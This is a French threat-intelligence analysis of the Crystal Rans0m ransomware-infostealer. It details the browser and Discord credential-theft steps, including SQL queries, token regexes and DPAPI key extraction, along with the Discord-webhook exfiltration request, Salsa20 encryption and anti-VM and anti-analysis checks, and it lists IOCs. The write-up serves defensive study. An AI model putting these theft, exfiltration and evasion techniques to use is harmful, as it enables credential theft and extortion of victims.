Crystal Rans0m : un ransomware hybride émergent capable de voler

Cristal Rans0m est une famille de ransomwares jusqu’alors non documentée, développée dans le langage de programmation Rust, aperçue pour la première fois dans la nature le 2 septembre2023. Il est intéressant de noter qu’elle crypte les fichiers de la victime, exigeant une rançon pour leur libération, mais qu’elle vole également des informations sensibles sur les systèmes infectés.

Cette approche à double menace signifie que les attaquants peuvent doubler leur influence sur les victimes, augmentant potentiellement leurs chances de monétiser leurs attaques. Cette famille de ransomwares peut donc être classée dans la catégorie des malwares Stealer-as-a-Ransomware, un terme inventé par les chercheurs de Zscaler dans une publication sur RedEnergy.

En ce qui concerne sa paternité, Crystal Rans0m ne partage aucune similitude avec une autre famille de logiciels malveillants et n’a été attribué à aucun acteur de la menace connu. Dans cet article, nous analyserons les capacités techniques de Crystal Rans0m, décrivant en détail ses composants de ransomware et de voleur.


Menace émergente : ransomware hybride

Depuis que la double extorsion est devenue courante – les groupes de ransomware les plus connus publiant des informations confidentielles des victimes sur un site de fuite de données (DLS) – de nombreuses publications ont signalé l’utilisation de chaînes d’attaque à différentes étapes, impliquant à la fois un voleur d’informations et une charge utile de ransomware finale.

En combinant les capacités des ransomwares et des voleurs, les attaquants maximisent l’efficacité de leurs campagnes. Même si la rançon n’est pas payée, les données volées peuvent être vendues ou utilisées pour d’autres attaques, comme le vol d’identité ou le spear phishing. Il est très rare d’observer deux types de catégories de logiciels malveillants dans un seul fichier exécutable. Cependant, c’est le cas avec Crystal Rans0m, RedEnergy et FTCODE.

Actuellement, les groupes de ransomware semblent préférer séparer les activités d’exfiltration de données des activités de chiffrement, mais il est important de prêter attention à cette menace émergente et à la manière dont les groupes de ransomware innovent sur leurs TTP. Un autre cas documenté de ransomware hybride est le RAT-as-a-Ransomware, avec les cas de VenomRAT et Anarchy Panel RAT, qui intégrent un composant de ransomware.


Analyse technique

Cette section se concentrera sur un échantillon avec sha256 15219aa22db99f064c47c224a205cdd3ed438dabd2d2593242ed2882e6458311, qui était le dernier trouvé au moment de l’analyse. L’analyse technique comprendra d’abord un aperçu des actions initiales effectuées par le malware, suivi de ses principales caractéristiques en tant que voleur et ransomware. Enfin, l’équipe KrakenLabs d’Outpost24 ayant détecté un nouvel échantillon juste avant de publier ce billet de blog, la dernière section présentera les particularités d’un échantillon plus récent datant de juillet 2024.


Fonctionnalités clés

  • Chiffrement des données de la victime pour obtenir une rançon
  • Demande de paiement de rançon en Monero, améliorant l’anonymat
  • En tant que voleur, il se concentre principalement sur les navigateurs, mais il cible également les clients de Steam, Discord et Riot Games
  • Utilise les webhooks Discord pour les opérations de commande et de contrôle


Actions initiales

Avant toute opération de vol ou de ransomware, Crystal charge sa configuration :


Déchiffrement du Webhook Discord utilisé pour l’exfiltration

Crystal utilise un Webhook Discord pour exfiltrer les données volées ainsi que la clé et le nonce utilisés pour le chiffrement. Ce webhook est codé en dur mais il est crypté et encodé. Ainsi, à partir de sa configuration initiale, il procède à son décryptage, en utilisant une clé codée en dur (également utilisée pour déchiffrement une partie de la demande de rançon), et de simples opérations XOR et de tableau, puis le décode en utilisant la base 64.


Il génère ainsi des chemins d’accès pour les logiciels ciblés

Dans le cadre de sa configuration, il génère également les chemins d’accès aux répertoires de données ciblées (sous « %localappdata%» ou «%appdata% »). Pour les navigateurs, il génère deux ensembles distincts :

C:\Users\MyPC\AppData\Roaming\Opera Software\Opera Stable 
C:\Users\MyPC\AppData\Roaming\Opera Software\Opera GX Stable 
C:\Users\MyPC\AppData\Local\Amigo\User Data 
C:\Users\MyPC\AppData\Local\Torch\User Data 
C:\Users\MyPC\AppData\Local\Kometa\User Data 
C:\Users\MyPC\AppData\Local\Orbitum\User Data 
C:\Users\MyPC\AppData\Local\CentBrowser\User Data 
C:\Users\MyPC\AppData\Local\7Star\7Star\User Data 
C:\Users\MyPC\AppData\Local\Spfutnik\Sputnik\User Data 
C:\Users\MyPC\AppData\Local\Google\Chrome SxS\User Data

C:\Users\MyPC\AppData\Local\Vivaldi\User Data 
C:\Users\MyPC\AppData\Local\Microsoft\Edge\User Data 
C:\Users\MyPC\AppData\Local\Yandex\YandexBrowser\User Data 
C:\Users\MyPC\AppData\Local\Iridium\User Data 
C:\Users\MyPC\AppData\Local\uCozMedia\Uran\User Data 
C:\Users\MyPC\AppData\Local\BraveSoftware\Brave-Browser\User Data 
C:\Users\MyPC\AppData\Local\Google\Chrome\User Data

Il génère également des chemins pour Discord standard, Discord Canary et Discord PTB.


Composant Infostealer


Répertoire de travail du logiciel malveillant

Lors de la récupération d’un répertoire, d’un fichier ou de l’analyse du contenu d’un fichier, Crystal crée d’abord un nouveau dossier de travail personnalisé pour logiciels malveillants sous «%Temp%\wintemp.<random>\». Ensuite, le fichier ciblé sera copié dans le dossier de travail du logiciel malveillant, lu et supprimé lorsqu’il ne sera plus nécessaire.

Le processus de suppression n’utilise pas les API DeleteFileA/W. Pour effectuer la suppression du fichier, Crystal ouvre d’abord le fichier avec l’indicateur FILE_FLAG_DELETE_ON_CLOSE , ce qui provoquera la suppression du fichier une fois tous ses handles fermés. Ensuite, il renomme le fichier et le déplace vers le répertoire « %Temp% » à l’aide de l’API SetFileInformationByHandle , avec FileRenameInfo comme paramètre FileInformationClass et « \\?\%Temp%\rm-<counter> » comme nouveau chemin.

Ce comportement n’est pas spécifique à cette famille de malwares, mais à la Bibliothèque Rust utilisée pour effectuer la suppression (supprimer_dir_alllibrary).


Vol d’informations du navigateur


Obtenir la clé principale du navigateur

Afin de voler la clé principale, Crystal parcourt les chemins du navigateur et vérifie s’ils sont présents dans l’hôte. Si tel est le cas, il tente de localiser leur fichier Local State pour extraire la clé principale du navigateur.

Crystal crée un dossier de travail temporaire pour les logiciels malveillants sous «  %Temp%\wintemp.<random>\ » et essaie de copier le fichier « \<browser path>\User Data\Local State » dans le dossier de travail MW.

En cas de succès, il lira son contenu et tentera de localiser la clé «os_crypt » et la clé «encrypted_key » à l’intérieur. Ensuite, il décodera la valeur récupérée – codée en base64 – supprimera le suffixe « DPAPI » et appellera l’API CryptUnprotectData pour obtenir la clé principale.


Collecte d’informations sur le navigateur

Une fois la clé principale obtenue avec succès, Crystal parcourt ensuite les fichiers à l’intérieur du répertoire « \User Data » du navigateur afin de localiser le dossier « \Default ».

Le tableau suivant montre le DDBB SQLite ciblé, ainsi que les requêtes SQL utilisées pour collecter les informations depuis elles. Encore une fois, s’ils sont trouvés, les fichiers ciblés seront copiés dans un dossier de travail de logiciel malveillant et lus à partir de là.

FichierRequêtes SQL
<\Browser path>\User Data\Default\Login DataSELECT origin_url, username_value, password_value FROM logins
<\Browser path>\User Data\Default\Historyselect term from keyword_search_terms select current_path, tab_url from downloads select url from downloads_url_chains
<\Browser path>\User Data\Default\Cookies   <\Browser path>\User Data\Default\Network\Cookiesselect host_key, name, encrypted_value, path from cookies

Lorsque les informations des cookies sont récupérées, la «  encrypted_value » sera décryptée à l’aide d’AES avec la clé principale précédemment obtenue.


Vol d’informations Discord

Le voleur a deux manières de cibler les données des utilisateurs de Discord :

  1. À partir des navigateurs
  2. Depuis l’application de bureau Discord

Obtenir des jetons d’utilisateur Discord à partir des navigateurs

Après avoir obtenu la clé principale et appelé la fonction de vol du navigateur, il essaiera de localiser le chemin «\Local Storage\leveldb» dans le chemin par défaut du navigateur. S’il est trouvé, il l’itérera en essayant de localiser les fichiers «.log » ou « .ldb ». Si l’un d’entre eux est trouvé, il recherchera les jetons d’utilisateur Discord sur leur contenu, en utilisant la regex suivante :

[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}

Depuis le client local Discord

Le voleur essaie de localiser les chemins Discord et, s’il en trouve, il essaie d’extraire la clé principale avec une approche équivalente à celle utilisée pour les navigateurs. Il essaie ensuite de localiser tous les fichiers «.log» ou «.lbd» dans les sous-chemins «leveldb».

Dans ce cas, il tentera de localiser les jetons chiffrés à l’aide de la regex suivante :

dQw4w9WgXcQ:[^\"]*

Le jeton récupéré est codé en base64, il sera donc d’abord décodé puis décrypté à l’aide d’AES avec la clé principale récupérée.


Dernières étapes et exfiltration de données


Obtenir l’adresse IP de la victime

Avant d’exfiltrer les informations, Crystal tentera d’obtenir l’adresse IP de la victime à partir de « hxxp://ifconfig[.] me ». Cette IP sera très probablement utilisée comme identifiant pour la victime comme cela sera montré dans une section ultérieure (dans la sous-section « Exfiltration de la clé »). La structure de la demande est équivalente pour les deux requêtes. Néanmoins, dans ce premier contact, le « Nonce » et la « Key » ne sont pas envoyés car ils n’ont pas encore été générés (le champ valeur est renseigné par un underscore).


Saisie des fichiers Steam

Si Steam est installé sur l’hôte (ce qui est vérifié en recherchant le répertoire «C:\Program Files (x86)\Steam»), il essaiera de récupérer les fichiers «loginusers.vdf» et «ssfn».

Tout d’abord, il va essayer de localiser son sous-répertoire «Config » et le fichier « loginusers.vdf » qu’il contient. Il va ensuite parcourir le répertoire Steam en essayant de localiser les fichiers « ssfn » (Steam Sentry File) – utilisés pour stocker les informations d’identification Steam.


Récupération des fichiers Riot Games

Le voleur tentera de localiser le répertoire «%LocalAppData%\Riot Games\Riot Client\Data» et, s’il le trouve, récupérera tous les fichiers qu’il contient (y compris les sous-répertoires).


Exfiltration d’informations

Les informations collectées seront stockées dans des fichiers (en mémoire) et exfiltrées avec l’en-tête « Content-Disposition », en utilisant les directives « name » et « filename ».

Voir ci-dessous un exemple de ces données pour exfiltrer les mots de passe de navigateur collectés :

Content-Disposition: form-data; name="passwds"; filename="passwords.txt"

Le tableau ci-dessous résume les informations exfiltrées :

NomNom du fichierDescription
passwdspasswords.txtMots de passe collectés du navigateur
htermsterms.txtHistorique collecté des recherches dans le navigateur
hdownloaddownloads.txtTéléchargements collectés du navigateur
visitedvisited.txtSites collectés visités par le navigateur
cookiescookies.txtCookies collectés du navigateur
tkns.txttkns.txtJetons Discord collectés
steam.zipsteam.zipFichiers Steam récupérés
riot.zipriot.zipFichiers Riot récupérés


Composant du ransomware

En tant que ransomware, il parcourt les dossiers système, à la recherche de fichiers à crypter. Outre l’exclusion des dossiers système Windows, il contient un ensemble codé en dur de répertoires à exclure du chiffrement :

AppData 
ProgramData 
Program Files 
Program File(x86) 
Local Settings\\Temp

Cristal Rans0m utilise SALSA20 pour le chiffrement, qui est un chiffrement symétrique de flux qui utilise un flux de clés 64 bits.

Il fonctionne en générant un flux de clés continu de bits pseudo-aléatoires, qui agit comme une clé, qui est xorée avec le texte en clair à crypter.


Générer la clé

Une graine aléatoire de 32 octets est générée à l’aide de  l’API BCryptGetRandom pendant les premières étapes d’exécution. BCRYPT_USE_SYSTEM_PREFERRED_RNG drapeau est défini comme, ce qui implique l’utilisation de « l’algorithme générateur de nombres aléatoires préféré du système ».

Deux valeurs pseudo-aléatoires seront générées : une clé de 32 octets et un nonce de 8 octets. Ces deux valeurs, ainsi que quatre chaînes codées en dur de 4 octets et un compteur de 8 octets seront utilisées pour générer un état interne initial de 64 octets.

Matrice d’état interne Salsa20.

Ce processus est exécuté pour chaque fichier à crypter, ce qui donne la même matrice initiale.


Salsa20 tours

Ci-dessous, on peut observer l’implémentation de salsa20 pour générer la clé finale :

Implémentation de Salsa20 (implémentation du code C/C++ à partir de : https://en.wikipedia.org/wiki/Salsa20).


Chiffrement des fichiers

Le processus de chiffrement commence par la lecture du contenu du fichier. Ensuite, chaque octet sera xoré avec l’octet de flux de clés correspondant. Enfin, le contenu chiffré sera encodé en base64.

Le ransomware ne modifie pas l’extension des fichiers cryptés.


Exfiltrer la clé

La clé de 32 octets et le nonce de 8 octets sont tous deux exfiltrés via le webhook Discord, à l’aide d’une requête POST.

La communication entre le malware et Discord est cryptée via le protocole SSL. Pour ce faire, Crystal utilise l’API EncryptMessage.

On peut observer les paramètres et le contenu de la requête suivants, avant chiffrement :

POST /api/webhooks/<webhook>
HTTP/1.1
content-type: application/json
content-length: <size>
accept: */*
host: discord.com
{\"content\": \"```IP: <victim’s IP>\\nKey: <32B generated Key>\\nNonce: <8B Nonce>```\"}


Demande de rançon

La demande de rançon est écrite en «%Temp%\gui.hta » et montrée en utilisant mshta.exe (composant qui fournit l’hôte d’application HTML Microsoft, qui permet l’exécution de fichiers .HTA (application HTML). Le contenu principal de la demande de rançon est codé en dur en texte brut. Le reste des informations (au format HTML) est crypté avec XOR (en utilisant « 0x9 » comme clé dans l’échantillon analysé) et codé en base64.

Il crée un fichier batch dans le dossier de démarrage, chargé de recharger la note de rançon à chaque redémarrage.


Version plus récente

Alors que nous étions sur le point de publier cet article de blog, nous avons trouvé un nouvel échantillon (sha256 bed70b08cf8b00b4e6b04acd348b5e0343d207f3083e1c58261679706bd10318) datant du 6 août 2024. Cette section résumera les principaux aspects de ce nouvel échantillon en comparaison avec celui que nous avons analysé dans les sections précédentes et les plus anciennes.

Le principal aspect à souligner est que nous n’avons pas observé de comportement de ransomware dans ce nouvel échantillon. Ce changement se reflète dans le code de plusieurs manières, les principales étant les suivantes : aucun code d’algorithme salsa20 n’est observé ; les bibliothèques Rust liées à cette fonctionnalité ont été supprimées ; les requêtes ne contiennent plus les champs « Key » et « Nonce », maintenant seule l’adresse IP de la victime est envoyée ; et aucune référence ni à « mshta.exe » ni au nom de fichier de la note de rançon (« gui.hta »).

Ce nouvel échantillon nous amène à l’hypothèse selon laquelle Crystal serait une solution modulaire, permettant à l’attaquant de choisir les modules à déployer pour chaque attaque.

Un autre changement est que ce nouvel échantillon contient un nouveau webhook Discord, qui est codé en dur en texte brut, contrairement à la version cryptée précédente.

Un autre aspect important à souligner est que cet échantillon met en œuvre plusieurs techniques pour éviter l’émulation et le débogage. La plupart d’entre elles ont été observées dans des versions plus anciennes – n’étant pas présentes dans l’échantillon analysé dans les sections précédentes. Ce nouvel échantillon en incorpore un autre basé sur les contrôles de registres.


Techniques anti-VM

  • Il vérifie si un ensemble codé en dur de clés de registre associées au logiciel VM est présent sur l’hôte infecté à l’aide de l’API RegOpenKeyExW. Si une clé est trouvée, son exécution sera interrompue. La liste des clés de registre interrogées se trouve dans l’annexe 2.
  • Le voleur recherche les processus associés au logiciel VM dans les processus en cours d’exécution. Les processus recherchés sont les suivants :
Vmtoolsd.exe
Vmwaretrat.exe
Vmwareuser.exe
vm_process.exe
VmRemoteGuest.exe
  • Enfin, il vérifie si l’un des pilotes suivants associés au logiciel VM est présent dans l’hôte, à l’aide de l’API CreateFileW  :
C:\windows\System32\Drivers\Vmmouse.sys
C:\windows\System32\Drivers\vm3dgl.dll
C:\windows\System32\vmdum.dll
C:\windows\System32\Drivers\VBoxGuest.sys
  • Il contient également une vérification basée sur une durée pour entraver le processus de débogage. Pour ce faire, il exécute deux fois les API GetLocalTime et SystemTimeToFileTime , soustrait les résultats et vérifie si la différence est supérieure à 1 000. Si tel est le cas, il mettra fin à son exécution
  • Une fois encore, il va parcourir les processus en cours d’exécution, en les comparant cette fois à une liste contenant à la fois des processus associés aux machines virtuelles et aux outils d’analyse. L’annexe 2 contient également la liste des processus recherchés lors de ce contrôle.


Paternité

La demande de rançon contient certaines informations qui pourraient servir de point de départ pour attribuer l’activité de Crystal Rans0m à un acteur malveillant. La demande de rançon observée dans les échantillons analysés contient une adresse de portefeuille Monero, un identifiant de session et un webhook d’exfiltration Discord. Ces indicateurs n’ont pas été observés dans d’autres campagnes ou échantillons de logiciels malveillants ; par conséquent, nous n’avons pas pu attribuer la paternité de Crystal Rans0m à un acteur de la menace connu publiquement.

Un autre élément ayant retenu notre attention est l’utilisation de l’application de messagerie instantanée Session ( (getsession[.]org) comme méthode de communication entre l’opérateur du ransomware et la victime pour la négociation. En août 2024, il est très inhabituel de voir des groupes de ransomware utiliser Session, car nous n’avons localisé que quelques dizaines de notes de rançon avec un identifiant de session unique, y compris, des identifiants du type : SEXi ransomware. Les méthodes de contact les plus fréquemment observées pour les négociations de ransomware sont les emails : Jabber et Tox.


Demande de rançon

Lors de l’exécution, une nouvelle fenêtre contenant la demande de rançon s’affiche à l’écran. Il porte le titre « Crystal Rans0m », ce qui nous a permis de connaître le nom que les auteurs avaient initialement donné au malware. Le message annonce aux victimes que tous leurs fichiers ont été cryptés et que si elles souhaitent restaurer l’accès à leurs données, elles doivent payer 50 $ US en XMR (cryptomonnaie Monero) aux attaquants et les contacter en ouvrant une conversation de chat sur Session.

Demande de rançon montrée à la victime (échantillon 15219aa22db99f064c47c224a205cdd3ed438dabd2d2593242ed2882e6458311)

Les anciennes versions contenaient un compte à rebours au lieu du message codé en dur observé ci-dessus, qui contient une faute d’orthographe.

Demande de rançon montrée à la victime (échantillon b027fe1e1e97d980de593cfd265d004b310c7655d3ee27ea3f10beaf70285e22)

Il convient de mentionner que dans l’échantillon le plus ancien récupéré, la demande de rançon était censée contenir un identifiant qTox, mais il semble qu’il s’agisse d’un brouillon car aucun identifiant réel ni portefeuille de crypto-monnaie n’ont été écrits. Elle exigeait également un montant plus élevé.

Demande de rançon montrée à la victime (échantillon 693fb42336167d5432a807fcb9afcac7002113fc37b05a2d3aa61c1356256c52)

Le choix du portefeuille Monero pour facturer la rançon nous empêche d’analyser l’efficacité, la diffusion et la rentabilité de l’utilisation de Crystal Rans0m. Contrairement au Bitcoin et à d’autres crypto-monnaies majeures, les transactions Monero peuvent être vérifiées, mais sont anonymes et ne peuvent pas être retracées jusqu’à l’adresse du portefeuille d’origine ou de celui du destinataire. C’est la raison pour laquelle de nombreux acteurs malveillants préfèrent utiliser Monero plutôt que des crypto-monnaies plus populaires et faciles à utiliser comme Bitcoin et Ethereum.


Victimologie

Bien que le nombre d’échantillons de logiciels malveillants disponibles soit faible, l’analyse de l’origine des soumissions à VirusTotal donne quelques indices sur la localisation des victimes potentielles jusqu’à présent. Nous avons notamment observé un nombre plus élevé de soumissions en provenance d’Italie et de Russie.

Cependant, la motivation de l’acteur de la menace derrière Crystal Rans0m est le gain financier et, par conséquent, nous n’évaluons pas les objectifs de l’adversaire en ciblant des pays ou des industries spécifiques, mais en ciblant sans discrimination.

PaysSoumissionsPourcentage
Italie420%
Fédération de Russie420%
Ukraine210%
Géorgie15%
Lituanie15%
Chine15%
États-Unis15%
Pérou15%
Royaume-Uni15%
Philippines15%
Argentine15%
Suède15%
Brésil15%


Points clés à retenir

Crystal Rans0m est un malware assez simple et à faible prévalence, qui présente cependant certaines caractéristiques distinctes dignes d’attention. Sa combinaison de capacités de vol d’informations et de chiffrement de fichiers place cette famille de logiciels malveillants dans la catégorie rare des Stealer-as-Ransomware. Crystal Rans0m illustre le potentiel dangereux de cette menace hybride et souligne la nécessité de mettre en place des mesures de sécurité avancées ainsi que des stratégies complètes de réponse aux incidents. Les organisations doivent rester vigilantes et proactives pour se protéger de ces doubles menaces qui visent à voler des données sensibles et à crypter des fichiers en même temps. Les analystes d’Outpost24 KrakenLabs continueront de surveiller l’état des ransomwares hybrides et d’analyser leur potentiel à devenir une tendance dans le paysage des ransomwares.


Protégez votre organisation grâce au renseignement sur les menaces

Threat Context d’Outpost24 vous permet de surveiller les menaces émergentes telles que Crystal Rans0m, de suivre l’empreinte de votre organisation sur le dark web et d’obtenir des informations contextuelles sur les acteurs de la menace et leurs campagnes. Réservez une démo en direct aujourd’hui.

Vous ne savez pas par où commencer avec les renseignements sur les menaces ? Discutez avec un expert de la meilleure solution pour votre organisation.


TTP

Exécution

T1059 – Command and Scripting Interpreter

Persistance

T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Évasion défensive

T1027 – Obfuscated Files or Information

T1140 – Deobfuscate/Decode Files or Information

T1055 – Process Injection

T1562.001 – Impair Defenses: Disable or Modify Tools

T1497 – Virtualization/Sandbox Evasion

Découverte

T1082 – System Information Discovery

Collection

T1555.003 – Credentials from Password Stores: Credentials from Web Browsers

Exfiltration

T1567.004 – Exfiltration Over Web Service: Exfiltration Over Webhook

Impact

T1486 – Data Encrypted for Impact

T1657 – Financial theft


IOC

Crystal Rans0m hashes

bed70b08cf8b00b4e6b04acd348b5e0343d207f3083e1c58261679706bd10318
15219aa22db99f064c47c224a205cdd3ed438dabd2d2593242ed2882e6458311
b027fe1e1e97d980de593cfd265d004b310c7655d3ee27ea3f10beaf70285e22
4970bd280da663f483f927f3a6c47833ebcbfe2b640ee66a309b41c7ed084375
693fb42336167d5432a807fcb9afcac7002113fc37b05a2d3aa61c1356256c52

Discord webhook used for data exfiltration

hxxps://discord[.]com/api/webhooks/1270187531933057115/OTYZL7aHM9A-o9RxQmRvXz_YkOC_qc8MhVD3vPFP0aXhhcBkCW_FokOoSq2SiaPlIpqW
hxxps://discord[.]com/api/webhooks/1144625488816525372/uYBmr5tVjy1fAqE3FP5t7jbdaWTQcY5mmRZSJavfml9zU2QqWBq-4oDVqTnKwWcbPw3d

Monero cryptocurrency wallet address

4A5tWDtKsqSX1bXPrjycV422D9oov73gEJxr1CUmhXMAfVqyhcmZvhPHBeW9ztrp584kkd3BW4xk9XW4PdAG3p2wMBcaRbJ

Session id

05c34f70f377339720875a54bfb754a31311ed994986cfd51e7fa56114b7bd1c0f

Malware working folder

C:\\Users\\Administrator\\AppData\\Local\\Temp\\wintemp.[STRING]


ANNEXE 1 : Logiciels ciblés

LogicielChemin d’accès
Opera\Opera Software\Opera Stable
Opera\Opera Software\Opera GX Stable
Amigo\Amigo\User Data
Torch\Torch\User Data
Kometa\Kometa\User Data
Orbitum\Orbitum\User Data
CentBrowser\CentBrowser\User Data
7Star\7Star\7Star\User Data
Sputnik\Sputnik\Sputnik\User Data
Chrome SxS\Google\Chrome SxS\User Data
Vivaldi\Vivaldi\User Data
Microsoft Edge\Microsoft\Edge\User Data
Yandex\Yandex\YandexBrowser\User Data
Iridium\Iridium\User Data
Iridium\uCozMedia\Uran\User Data
Brave\BraveSoftware\Brave-Browser\User Data
Chrome\Google\Chrome\User Data
Discord\discord
Discord Canary\discordordcanary
Discord PTB\discordptb
Riot Games\AppData\Local\Riot Games\Riot Client\Data

ANNEX 2: Contrôles « anti »


Clés de registre

Software\Classes\Folder\shell\sandbox
SOFTWARE\Microsoft\Hyper-V
SOFTWARE\Microsoft\VirtualMachine
SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters
SYSTEM\ControlSet001\Services\vmicheartbeat
SYSTEM\ControlSet001\Services\vmicvss
SYSTEM\ControlSet001\Services\vmicshutdown
SYSTEM\ControlSet001\Services\vmicexchange
SYSTEM\CurrentControlSet\Enum\PCI\VEN_1AB8*
SYSTEM\CurrentControlSet\Services\SbieDrv
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sandboxie
HARDWARE\ACPI\DSDT\VBOX__
HARDWARE\ACPI\FADT\VBOX__
HARDWARE\ACPI\RSDT\VBOX__
SOFTWARE\Oracle\VirtualBox Guest Additions
SYSTEM\ControlSet001\Services\VBoxGuest
SYSTEM\ControlSet001\Services\VBoxMouse
SYSTEM\ControlSet001\Services\VBoxService
SYSTEM\ControlSet001\Services\VBoxSF
SYSTEM\ControlSet001\Services\VBoxVideo
SYSTEM\ControlSet001\Services\vpcbus
SYSTEM\ControlSet001\Services\vpc-s3
SYSTEM\ControlSet001\Services\vpcuhub
SYSTEM\ControlSet001\Services\msvmmouf
SOFTWARE\VMware, Inc.\VMware Tools
SYSTEM\ControlSet001\Services\vmdebug
SYSTEM\ControlSet001\Services\vmmouse
SYSTEM\ControlSet001\Services\VMTools
SYSTEM\ControlSet001\Services\VMMEMCTL
SYSTEM\ControlSet001\Services\vmware
SYSTEM\ControlSet001\Services\vmci
SYSTEM\ControlSet001\Services\vmx86
SOFTWARE\Wine
HARDWARE\ACPI\DSDT\xen
HARDWARE\ACPI\FADT\xen
HARDWARE\ACPI\RSDT\xen
SYSTEM\ControlSet001\Services\xenevtchn
SYSTEM\ControlSet001\Services\xennet
SYSTEM\ControlSet001\Services\xennet6
SYSTEM\ControlSet001\Services\xensvc
SYSTEM\ControlSet001\Services\xenvdb


Processus associés aux outils d’analyse

http toolkit.exe
httpdebuggerui.exe
wireshark.exe
fiddler.exe
charles.exe
regedit.exe
cmd.exe
taskmgr.exe
vboxservice.exe
df5serv.exe
processhacker.exe
vboxtray.exe
vmtoolsd.exe
vmwaretray.exe
ida64.exe
ollydbg.exe
pestudio.exe
vmwareuser
vgauthservice.exe
vmacthlp.exe
x96dbg.exe
vmsrvc.exe
x32dbg.exe
vmusrvc.exe
prl_cc.exe
prl_tools.exe
qemu-ga.exe
joeboxcontrol.exe
ksdumperclient.exe
ksdumper.exe
joeboxserver.exe
xenservice.exe